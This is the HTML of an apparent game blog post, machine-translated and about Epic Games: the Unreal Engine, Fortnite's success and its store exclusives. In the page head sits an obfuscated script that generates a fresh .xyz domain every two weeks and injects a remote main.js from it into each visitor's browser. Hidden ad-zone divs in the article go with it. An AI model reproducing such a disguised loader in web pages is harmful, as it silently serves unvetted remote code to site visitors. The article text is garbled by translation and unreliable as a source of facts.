<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="Throughout the recent game circle, most of the game manufacturers have always maintained a relatively stable performance. Apart from Ubisoft, which was recently reviled by tens of thousands of people">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="The higher the level, the crazier In depth understanding of epic&#39;s past glory and current difficulties">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="Throughout the recent game circle, most of the game manufacturers have always maintained a relatively stable performance. Apart from Ubisoft, which was recently reviled by tens of thousands of people">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/795d32e19c614afdb5c7377c028c5aff.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/d76e4ced6ef44e9292528a6408891e7e.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/84cddde38c88425092393755df7f2c03.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/64d2e52c853d4d3ab2bcf093d187e3a6.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/bfc5392e322f4833a3791a4d9334aa6c.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/7ba4525eba9d4d219f4ef68a0f5ff2ba.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/13640dae93f045bf8efd0ed085c58f2f.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/533063088a34491aa5e0825ef98ffb0b.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/97d0bfa43cc34160ae60d7179a4d4ebb.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:49.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="The higher the level, the crazier In depth understanding of epic&#39;s past glory and current difficulties">
<meta name="twitter:description" content="Throughout the recent game circle, most of the game manufacturers have always maintained a relatively stable performance. Apart from Ubisoft, which was recently reviled by tens of thousands of people">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/795d32e19c614afdb5c7377c028c5aff.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>The higher the level, the crazier In depth understanding of epic's past glory and current difficulties | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">The higher the level, the crazier In depth understanding of epic's past glory and current difficulties</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Throughout the recent game circle, most of the game manufacturers have always maintained a relatively stable performance. Apart from Ubisoft, which was recently reviled by tens of thousands of people due to “ghost action: breakpoint”, I’m afraid that Epic Games, standing on the cusp of the storm, has the worst reputation. People who know this company may know that it is famous for its R &amp; D engine. Later, it became an international first-line game manufacturer again by relying on Fortress night, making a lot of money. Since this company started to sell games, the criticism about this company has not subsided until now. It can be said that it destroyed its own hard to establish Good reputation.<br><img src="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/795d32e19c614afdb5c7377c028c5aff.jpg" alt="The higher the level, the crazier In depth understanding of epic&#39;s past glory and current difficulties"><br>But Tucao go to Tucao, it is undeniable that the company is not only rich and powerful, but in some aspects of the platform competition is somewhat persistent and crazy, spare no effort to lose money to think about to pull down Steam, like a new era of “Heroes”. The author holds a reservation on the evaluation of epic. This time, I want to take you to have a deep understanding of all aspects of epic.<br>False and false<br>The author has such a feeling that anyone who talks about the origin of video games can always contact a talented gamer named John kamak and his related achievements, and this is no exception. The first first person shooting game in the history of the game is “German headquarters 3D” created by John kamak. Although this game is not the first game to adopt the first person as the perspective, it is the first game about the concept of “game engine”. In short, he is always thinking about making a 3D game. No matter what type and theme it is, it needs to build a 3D architecture. He first builds the architecture, and then decides the content and theme of the game and adds them to the architecture. If he wants to develop 3D games in the future, the architecture can be used again. This concept didn’t really improve until John kamak’s id software launched the second FPS game “doom”. The development of “doom 2” in a very short cycle can well illustrate this point, because the game engine can be continuously improved, the more perfect, the more efficient.<br><img src="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/d76e4ced6ef44e9292528a6408891e7e.jpg" alt="The higher the level, the crazier In depth understanding of epic&#39;s past glory and current difficulties"><br>German headquarters 3D<br>The concept of engine has caused a great sensation in the game development industry. There are such convenient and quick methods that are not really different from fools. Therefore, a large number of people have joined in the research of game engine. The protagonist of our story, Tim Sweeney, is one of these people. Although this person has not developed many games, he has studied engine With great enthusiasm, this person is now the founder of epic company. In 1998, epic company and digital extremes studio in Canada jointly developed an FPS game called unreal, which is based on the engine they developed. Therefore, the name of the engine is also called unreal. This game is very amazing in the view of the screen performance at that time, no matter in the scene construction or map definition, it has a very amazing high quality, and the optimization and fluency of the engine are also very satisfactory. Then the super-high processing performance and fluency of the virtual arena developed by the same engine are enough to illustrate this.<br><img src="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/84cddde38c88425092393755df7f2c03.jpg" alt="The higher the level, the crazier In depth understanding of epic&#39;s past glory and current difficulties"><br>Unreal<br>The powerful performance of virtual engine makes many manufacturers covet it. Even John kamak himself praises it. It’s better to buy the off the shelf engine license directly from epic than to work on the engine himself. Isn’t it once and for all? Virtual engine licensing contracts are pouring in, and in a very short period of time, they have reached cooperation with more than ten game manufacturers. Given that the virtual engine is inherently based on FPS games, most of the companies using the virtual engine are also developing shooting games and action games. Epic is not complacent about this, but has stepped up the speed of upgrading the engine. After all, the performance of all kinds of game hardware is gradually improving, which is an opportunity that can not be missed for the improvement of the game screen. After 2000, the unreal 2 engine has raised the average screen standard of the industry to another level. This time, not only is the performance of the screen bright enough, but also has a better physical effect, making the game more immersive. As soon as the engine was announced, more game companies came to seek authorization, and epic officially put its own engine on the shelf as a long-term open business project.<br><img src="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/64d2e52c853d4d3ab2bcf093d187e3a6.jpg" alt="The higher the level, the crazier In depth understanding of epic&#39;s past glory and current difficulties"><br>The highest rendering of unreal 4 is almost unreal (see sawtooth)</p>
<h1 id="night-of-Fortress"><a href="#night-of-Fortress" class="headerlink" title="night of Fortress"></a>night of Fortress</h1><p>Until now, the unreal engine has had four major versions of update iterations in total. Now, the Unreal Engine 4 has become a favorite engine of most game developers, not only with moderate price and good performance, but also with the feeling of 3A masterpieces. However, no matter how other manufacturers favor this engine, they can never be more familiar with it than developing epic. Therefore, for many years, no epic has been able to really play the performance of this engine. In the past few years of engine upgrading, epic has never stopped developing games. Unreal arena has been back and forth for several generations. However, due to the cold market of FPs in the arena, they can only choose to put this series aside temporarily. On the other hand, they have tried MoBa games. However, due to the strong strength of competitors and the low publicity, the model named《 It was not long before the MoBa game of Paragon was stopped.<br><img src="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/bfc5392e322f4833a3791a4d9334aa6c.jpg" alt="The higher the level, the crazier In depth understanding of epic&#39;s past glory and current difficulties"><br>Illusory hegemony<br>Empty has a hard technology epic fell into confusion, can’t sell the engine for a lifetime, they still want to do the game, so at the completion of unreal 4, they said they would launch the first game using this next generation engine, which is called “night of the fortress”. The original fortress night is a survival game that mainly focuses on cooperation among multiple people. It takes sandbox construction and shooting as its selling point. Although it looks very interesting, many players say that they have been tired of aesthetic appreciation of survival games. Although the quality of this game is good, it is doomed not to be sold. At the same time, there was a “chicken eating craze” in the global market, which caused many manufacturers to follow suit. Epic had a good idea about this. It was based on the cold “night of the fortress” and combined with many features of this survival game to create a big escape game, so the PVP big escape mode of “night of the fortress” came into being, and adopted the free escape mode The operation mode of fee downloading and jewelry charging.<br><img src="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/7ba4525eba9d4d219f4ef68a0f5ff2ba.jpg" alt="The higher the level, the crazier In depth understanding of epic&#39;s past glory and current difficulties"><br>Night of the fortress<br>Although the screen of the game is in the humorous cartoon style, the great escape combined with the construction elements undoubtedly has a higher interest, thus forming a game atmosphere of light competition and heavy entertainment. Due to different customs and people, the game is cold in China, but it is quite popular in Europe and the United States. The heat of the game exceeds the Jedi survival (to a large extent) for a long time It is also related to the poor game environment in China. With the help of epic’s hard power, the night of the fortress with unreal 4 is not only fine in picture, but also excellent in optimization. Even when it runs at a low frame rate, it can’t feel the card feeling very much. It has a very low requirement for configuration. On the contrary, the Jedi survival next door is famous for its high requirement for optimized differential configuration, forming a sharp contrast. The game itself is full of fun, humorous and easy, with low configuration requirements and good optimization. Moreover, it is free to play with only accessories. Such a game is hard not to catch fire in overseas areas. Relying on very compact and novel updated content, fortress night has not only become the most popular and best-known big escape game for players, but also makes epic earn a lot of money.<br><img src="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/13640dae93f045bf8efd0ed085c58f2f.jpg" alt="The higher the level, the crazier In depth understanding of epic&#39;s past glory and current difficulties"></p>
<h1 id="the-wave-of-the-wind"><a href="#the-wave-of-the-wind" class="headerlink" title="the wave of the wind"></a>the wave of the wind</h1><p>Today’s epic has not only money, but also Tencent’s shares. After all, Tencent is also focused on making fortress night profitable in China. With money and momentum, epic is not only expanding, but also trying to make a big move. That is to build its own game platform and sell other people’s games to make more money. It’s reasonable to say that epic does what it does on the platform, but it has to compete with steam, who can’t fight for eight poles. It complains that 30% of the platform of steam is too high, which is the “cancer” of the game industry, and they only receive 12% of the share, which can make game developers and publishers get higher profits. However, in fact, 30% draw is the industry’s unified standard. Basically all game platforms and even host platforms are charged 30% draw. This standard has lasted for many years, and no one has complained.<br>It’s just epic that is “one of the best”. From a rational point of view, maybe epic’s move is just to attract more game developers and distributors to their platforms, so as to enrich the lineup of the game, so as to attract more players. At the beginning of the launch of bijingping platform, there were only a few independent games with less fame, while the real 3A works were few Less.<br><img src="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/533063088a34491aa5e0825ef98ffb0b.jpg" alt="The higher the level, the crazier In depth understanding of epic&#39;s past glory and current difficulties"><br>The most unacceptable thing is that at the beginning of the platform’s launch, not only the stores in China are blocked, but also many long-awaited games are taken away as their own “limited time monopoly”, which has caused the dissatisfaction of quite a number of players. Even the overseas players without the locked area can’t see it. It’s immoral to jump out and accuse epic of this kind of behavior. Although the current epic has opened up the country and region, the trend of monopoly still hasn’t stopped. Instead, it’s to pay more and more money to buy the exclusive right of the game. This money is really quite heavy. Take remedy’s latest game “control” as an example, some financial reports say that epic spent 9.49 million euros, or more than 70 million yuan, to buy the exclusive right of the game A number is really shocking. Today’s epic is sparing no effort to expand its own game lineup. Although it makes players unhappy, why not make more money for other game companies? Especially for many independent game developers, perhaps what they lack is the difference of 18%.<br><img src="http://maiygu.xyz/2019/11/08/The higher the level, the crazier In depth understanding of epic's past glory and current difficulties/97d0bfa43cc34160ae60d7179a4d4ebb.jpg" alt="The higher the level, the crazier In depth understanding of epic&#39;s past glory and current difficulties"><br>Control<br>    concluding remarks<br>It is undeniable that, although epic’s various operations are very unpopular, but he did make a great contribution to the game development industry, from more and more developers choose to join the ranks of epic is enough to show that there are not only highly used engines, but also original games with high quality and good conscience of operation, and the author is very puzzled that the founder Why does Tim Sweeney want to brush the existence like a clown in a crazy way, not only to provoke the cooperation between platforms, but also to offend the players who have always had a good impression on them, perhaps just because they have the money and the right to be arrogant? I don’t think so. Maybe he did it just to attract other people’s attention. After all, he was willing to cooperate with those game companies. In his eyes, there were only contractual rules and regulations, and he didn’t care what he said to the outside world.<br>In the eyes of outsiders, what epic needs to do now is to find a way to save the word-of-mouth that has plummeted among the players. For developers, the terms of epic are good for themselves, but who can guarantee that epic’s conscience is not just a moment, and will not change from “Dragon Slayer warrior” to the same “dragon” in the future?</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/The most powerful player in action role-playing games, Diablo is 23 years old/" rel="next" title="The most powerful player in action role-playing games, Diablo is 23 years old">
                <i class="fa fa-chevron-left"></i> The most powerful player in action role-playing games, Diablo is 23 years old
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/The call of duty mobile game has become a global blockbuster, not only because of the high popularity of IP/" rel="prev" title="The call of duty mobile game has become a global blockbuster, not only because of the high popularity of IP">
                The call of duty mobile game has become a global blockbuster, not only because of the high popularity of IP <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#night-of-Fortress"><span class="nav-number">1.</span> <span class="nav-text">night of Fortress</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#the-wave-of-the-wind"><span class="nav-number">2.</span> <span class="nav-text">the wave of the wind</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
